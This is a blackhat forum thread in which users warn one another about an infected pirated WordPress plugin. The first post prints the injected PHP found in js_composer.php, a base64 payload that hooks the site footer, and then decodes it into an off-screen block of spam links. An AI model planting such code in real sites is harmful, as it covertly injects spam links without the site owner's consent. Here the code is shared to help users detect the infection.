Best Blackhat Forum

Pages: 1 2

hi,

today i found my wordpress site compromised.
i found the code below in one file named "js_composer.php"

be carefull and check your visual composer for this.

best regards!

Code:

if (!function_exists('onAddScriptsHtmls')) {

    add_filter( 'wp_footer', 'onAddScriptsHtmls');

    function onAddScriptsHtmls(){

        $html = "PGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyB0b3A6IC0yMzZweDsgb3ZlcmZsb3c6IGF1dG87​IHdpZHRoOjEyNDFweDsiPjxhIGhyZWY9Imh0dHA6Ly9mc2ZhbWlseS52bi9kdS1saWNoIj5kdSBsaWNo​PC9hPjxhIGhyZWY9Imh0dHA6Ly9mc2ZhbWlseS52bi9kaWEtZGllbS1hbi11b25nIj5kaWEgZGllbSBh​biB1b25nPC9hPjxoMj48YSBocmVmPSJodHRwOi8vZnNmYW1pbHkudm4vdmlkZW8vaGFpIj54ZW0gaGFp​PC9hPjwvaDI+PGgyPjxhIGhyZWY9Imh0dHA6Ly90aGVtZXN0b3RhbC5jb20vOTk5LXRoZS1iZXN0LXBy​ZW1pdW0tbWFnZW50by10aGVtZXMiPnRoZSBiZXN0IHByZW1pdW0gbWFnZW50byB0aGVtZXM8L2E+PC9o​Mj48aDI+PGEgaHJlZj0iaHR0cDovL3Rob2l0cmFuZ2Y1LnZuL2dpYXktbmFtL2dpYXktYm9vdC1uYW0i​PmdpYXkgYm9vdCBuYW08L2E+PC9oMj48aDI+PGEgaHJlZj0iaHR0cDovL3Rob2l0cmFuZ2Y1LnZuL2dp​YXktbnUvZ2lheS1sdW9pIj5naWF5IGx1b2kgbnU8L2E+PC9oMj48aDI+PGEgaHJlZj0iaHR0cDovL3Ro​b2l0cmFuZ2Y1LnZuL2dpYXktbnUvZ2lheS10aGUtdGhhbyI+Z2lheSB0aGUgdGhhbyBudTwvYT48L2gy​PjxoMj48YSBocmVmPSJodHRwOi8vcGh1bnV6LmNvbS90dS12aS9kYXQtdGVuLWNoby1jb24iPmRhdCB0​ZW4gY2hvIGNvbjwvYT48L2gyPjxoMj48YSBocmVmPSJodHRwOi8vcGh1bnV6LmNvbS90YWcvYW8tc28t​bWkiPsOhbyBzxqEgbWkgbuG7rzwvYT48L2gyPjxoMj48YSBocmVmPSJodHRwOi8vcGh1bnV6LmNvbS9s​YW0tZGVwL2dpYW0tY2FuIj5naeG6o20gY8OibiBuaGFuaDwvYT48L2gyPjxoMj48YSBocmVmPSJodHRw​Oi8vcGh1bnVzby52bi9raWV1LXRvYy1kZXAiPmtp4buDdSB0w7NjIMSR4bq5cDwvYT48L2gyPjxoMj48​YSBocmVmPSJodHRwOi8vcGh1bnVzby52bi9kYXQtdGVuLWhheS1jaG8tY29uIj7EkeG6t3QgdMOqbiBo​YXkgY2hvIGNvbjwvYT48L2gyPjxoMz48c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly9ibG9nLnRob2l0cmFu​Z2Y1LnZuIj54dSBoxrDhu5tuZyB0aOG7nWkgdHJhbmc8L2E+PC9zdHJvbmc+PHN0cm9uZz48YSBocmVm​PSJodHRwOi8vcGh1bnVzby52biI+UGh1bnVzby52bjwvYT48L3N0cm9uZz48c3Ryb25nPjxhIHN0eWxl​PSJmb250LXNpemU6IDExLjMzNXB0OyIgaHJlZj0iaHR0cDovL3Nob3BnaWF5bnUudm4iPnNob3AgZ2nD​oHkgbuG7rzwvYT48L3N0cm9uZz48c3Ryb25nPjxhIHN0eWxlPSJmb250LXNpemU6IDExLjMzNXB0OyIg​aHJlZj0iaHR0cDovL3Nob3BnaWF5bnUudm4vY2F0ZWdvcnkvZ2lheS1sdW9pLTIiPmdpw6B5IGzGsOG7​nWkgbuG7rzwvYT48L3N0cm9uZz48c3Ryb25nPjxhIHN0eWxlPSJmb250LXNpemU6IDExLjMzNXB0OyIg​aHJlZj0iaHR0cDovL3Nob3BnaWF5bnUudm4vY2F0ZWdvcnkvZ2lheS10aGUtdGhhbyI+Z2nDoHkgdGjh​u4MgdGhhbyBu4buvPC9hPjwvc3Ryb25nPjxzdHJvbmc+PGEgc3R5bGU9ImZvbnQtc2l6ZTogMTEuMzM1​cHQ7IiBocmVmPSJodHRwOi8vdGhvaXRyYW5nZjUudm4iPnRo4budaSB0cmFuZyBmNTwvYT48L3N0cm9u​Zz48c3Ryb25nPjxhIHN0eWxlPSJmb250LXNpemU6IDExLjMzNXB0OyIgaHJlZj0iaHR0cDovL3RoZW1l​c3RvdGFsLmNvbS90YWcvcmVzcG9uc2l2ZS13b3JkcHJlc3MtdGhlbWUiPlJlc3BvbnNpdmUgV29yZFBy​ZXNzIFRoZW1lPC9hPjwvc3Ryb25nPjxlbT48YSBzdHlsZT0iZm9udC1zaXplOiAxMC4zMzVwdDsiIGhy​ZWY9Imh0dHA6Ly8yeGF5bmhhLmNvbS90YWcvbmhhLWNhcC00LW5vbmctdGhvbiI+bmhhIGNhcCA0IG5v​bmcgdGhvbjwvYT48L2VtPjxlbT48YSBzdHlsZT0iZm9udC1zaXplOiAxMC4zMzVwdDsiIGhyZWY9Imh0​dHA6Ly8yZ2lheW51LmNvbS9naWF5LW51L2dpYXktY2FvLWdvdC1naWF5LW51Ij5naWF5IGNhbyBnb3Q8​L2E+PC9lbT48ZW0+PGEgc3R5bGU9ImZvbnQtc2l6ZTogMTAuMzM1cHQ7IiBocmVmPSJodHRwOi8vMmdp​YXludS5jb20iPmdpYXkgbnUgMjAxNTwvYT48L2VtPjxlbT48YSBocmVmPSJodHRwOi8vMnhheW5oYS5j​b20vdGFnL21hdS1iaWV0LXRodS1kZXAiPm1hdSBiaWV0IHRodSBkZXA8L2E+PC9lbT48ZW0+PGEgaHJl​Zj0iaHR0cDovL2ZzZmFtaWx5LnZuL2xhbS1kZXAvdG9jLWRlcCI+dG9jIGRlcDwvYT48L2VtPjxlbT48​YSBocmVmPSJodHRwOi8vaWhvdXNlYmVhdXRpZnVsLmNvbS8iPmhvdXNlIGJlYXV0aWZ1bDwvYT48L2Vt​PjxlbT48YSBzdHlsZT0iZm9udC1zaXplOiAxMC4zMzVwdDsiIGhyZWY9Imh0dHA6Ly8yZ2lheW51LmNv​bS9naWF5LW51L2dpYXktdGhlLXRoYW8iPmdpYXkgdGhlIHRoYW8gbnU8L2E+PC9lbT48ZW0+PGEgc3R5​bGU9ImZvbnQtc2l6ZTogMTAuMzM1cHQ7IiBocmVmPSJodHRwOi8vMmdpYXludS5jb20vZ2lheS1udS9n​aWF5LWx1b2ktMiI+Z2lheSBsdW9pIG51PC9hPjwvZW0+PGVtPjxhIHN0eWxlPSJmb250LXNpemU6IDEw​LjMzNXB0OyIgaHJlZj0iaHR0cDovL3BodW51ei5jb20iPnThuqFwIGNow60gcGjhu6UgbuG7rzwvYT48​L2VtPjxzdHJvbmc+PGEgaHJlZj0iaHR0cDovL2hhcmR3YXJlcmVzb3VyY2VzbmV3LmNvbS8iPmhhcmR3​YXJlIHJlc291cmNlczwvYT48L3N0cm9uZz48c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly9zaG9wZ2lheWx1​b2kuY29tLyI+c2hvcCBnacOgeSBsxrDhu51pPC9hPjwvc3Ryb25nPjxzdHJvbmc+PGEgaHJlZj0iaHR0​cDovL3d3dy50aG9pdHJhbmduYW1oYW5xdW9jLnZuLyI+dGjhu51pIHRyYW5nIG5hbSBow6BuIHF14buR​YzwvYT48L3N0cm9uZz48c3Ryb25nPjxhIGhyZWY9ImhodHRwOi8vZ2lheWhhbnF1b2MuY29tLyI+Z2nD​oHkgaMOgbiBxdeG7kWM8L2E+PC9zdHJvbmc+PHN0cm9uZz48YSBocmVmPSJodHRwOi8vZ2lheW5hbS5w​cm8vIj5nacOgeSBuYW0gMjAxNTwvYT48L3N0cm9uZz48c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly9zaG9w​Z2lheW9ubGluZS5jb20vIj5zaG9wIGdpw6B5IG9ubGluZTwvYT48L3N0cm9uZz48c3Ryb25nPjxhIGhy​ZWY9Imh0dHA6Ly9hb3NvbWloYW5xdW9jLnZuLyI+w6FvIHPGoSBtaSBow6BuIHF14buRYzwvYT48L3N0​cm9uZz48c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly90aG9pdHJhbmdmNS52bi8iPnNob3AgdGjhu51pIHRy​YW5nIG5hbSBu4buvPC9hPjwvc3Ryb25nPjxzdHJvbmc+PGEgaHJlZj0iaHR0cDovL2RpZW5kYW5uZ3Vv​aXRpZXVkdW5nLmNvbS8iPmRp4buFbiDEkcOgbiBuZ8aw4budaSB0acOqdSBkw7luZzwvYT48L3N0cm9u​Zz48c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly9kaWVuZGFudGhvaXRyYW5nLmVkdS52bi8iPmRp4buFbiDE​kcOgbiB0aOG7nWkgdHJhbmc8L2E+PC9zdHJvbmc+PHN0cm9uZz48YSBocmVmPSJodHRwOi8vZ2lheXRo​ZXRoYW9udWhjbS5jb20vIj5nacOgeSB0aOG7gyB0aGFvIG7hu68gaGNtPC9hPjwvc3Ryb25nPjxhIGhy​ZWY9Imh0dHA6Ly9waHVraWVudGhvaXRyYW5nZ2lhcmUuY29tLyI+cGjhu6Uga2nhu4duIHRo4budaSB0​cmFuZyBnacOhIHLhurs8L2E+PC9oMz48L2Rpdj4=";

        echo base64_decode($html);

    }    

}

don´t download from themestotal.com!

i have decoded it...

Code:

<div style="position: absolute; top: -236px; overflow: auto; width:1241px;"><a href="http://fsfamily.vn/du-lich">du lich</a><a href="http://fsfamily.vn/dia-diem-an-uong">dia diem an uong</a><h2><a href="http://fsfamily.vn/video/hai">xem hai</a></h2><h2><a href="http://themestotal.com/999-the-best-premium-magento-themes">the best premium magento themes</a></h2><h2><a href="http://thoitrangf5.vn/giay-nam/giay-boot-nam">giay boot nam</a></h2><h2><a href="http://thoitrangf5.vn/giay-nu/giay-luoi">giay luoi nu</a></h2><h2><a href="http://thoitrangf5.vn/giay-nu/giay-the-thao">giay the thao nu</a></h2><h2><a href="http://phunuz.com/tu-vi/dat-ten-cho-con">dat ten cho con</a></h2><h2><a href="http://phunuz.com/tag/ao-so-mi">áo sơ mi nữ</a></h2><h2><a href="http://phunuz.com/lam-dep/giam-can">giảm cân nhanh</a></h2><h2><a href="http://phunuso.vn/kieu-toc-dep">kiểu tóc đẹp</a></h2><h2><a href="http://phunuso.vn/dat-ten-hay-cho-con">đặt tên hay cho con</a></h2><h3><strong><a href="http://blog.thoitrangf5.vn">xu hướng thời trang</a></strong><strong><a href="http://phunuso.vn">Phunuso.vn</a></strong><strong><a style="font-size: 11.335pt;" href="http://shopgiaynu.vn">shop giày nữ</a></strong><strong><a style="font-size: 11.335pt;" href="http://shopgiaynu.vn/category/giay-luoi-2">giày lười nữ</a></strong><strong><a style="font-size: 11.335pt;" href="http://shopgiaynu.vn/category/giay-the-thao">giày thể thao nữ</a></strong><strong><a style="font-size: 11.335pt;" href="http://thoitrangf5.vn">thời trang f5</a></strong><strong><a style="font-size: 11.335pt;" href="http://themestotal.com/tag/responsive-wordpress-theme">Responsive WordPress Theme</a></strong><em><a style="font-size: 10.335pt;" href="http://2xaynha.com/tag/nha-cap-4-nong-thon">nha cap 4 nong thon</a></em><em><a style="font-size: 10.335pt;" href="http://2giaynu.com/giay-nu/giay-cao-got-giay-nu">giay cao got</a></em><em><a style="font-size: 10.335pt;" href="http://2giaynu.com">giay nu 2015</a></em><em><a href="http://2xaynha.com/tag/mau-biet-thu-dep">mau biet thu dep</a></em><em><a href="http://fsfamily.vn/lam-dep/toc-dep">toc dep</a></em><em><a href="http://ihousebeautiful.com/">house beautiful</a></em><em><a style="font-size: 10.335pt;" href="http://2giaynu.com/giay-nu/giay-the-thao">giay the thao nu</a></em><em><a style="font-size: 10.335pt;" href="http://2giaynu.com/giay-nu/giay-luoi-2">giay luoi nu</a></em><em><a style="font-size: 10.335pt;" href="http://phunuz.com">tạp chí phụ nữ</a></em><strong><a href="http://hardwareresourcesnew.com/">hardware resources</a></strong><strong><a href="http://shopgiayluoi.com/">shop giày lười</a></strong><strong><a href="http://www.thoitrangnamhanquoc.vn/">thời trang nam hàn quốc</a></strong><strong><a href="hhttp://giayhanquoc.com/">giày hàn quốc</a></strong><strong><a href="http://giaynam.pro/">giày nam 2015</a></strong><strong><a href="http://shopgiayonline.com/">shop giày online</a></strong><strong><a href="http://aosomihanquoc.vn/">áo sơ mi hàn quốc</a></strong><strong><a href="http://thoitrangf5.vn/">shop thời trang nam nữ</a></strong><strong><a href="http://diendannguoitieudung.com/">diễn đàn người tiêu dùng</a></strong><strong><a href="http://diendanthoitrang.edu.vn/">diễn đàn thời trang</a></strong><strong><a href="http://giaythethaonuhcm.com/">giày thể thao nữ hcm</a></strong><a href="http://phukienthoitranggiare.com/">phụ kiện thời trang giá rẻ</a></h3></div>

Well done crixxu !!!
+5 rep added !
Without any doubt sth to check in EVERY Visual Composer installations !
Thx again ;)

you´re welcome ;) you will find this code at the very end of the file.

Thanks crixxu Nice Thread

Just to add, did you download it from here or themestotal

btw, rep added, well, max from me lol

i´ve never heard of this f****g site themestotal.com before. so it must be from here.
bbhtf is my favorite site for stuff like that. i don´t remember the thread where i got this from. anyway, this was mentioned to inform bbhtf users of this.

yeah cool, thanks for the heads up man

Most of the themes here have this crap in them. Not worth the risk. Themestotal share 'free' themes which people upload here without knowing they are infected. Had too many of these now.

Thanks for heads up!

Thanks bro thanks for this infos

Thanks for the info :)
And look these shared WP plugins "Thrive Visual Editor" and "Azon Authority Plugin", its also infected.

Pages: 1 2

crixxu

karma1

crixxu

Gamestation

crixxu

Gamestation

grumble

qwestit

MomoLily

layona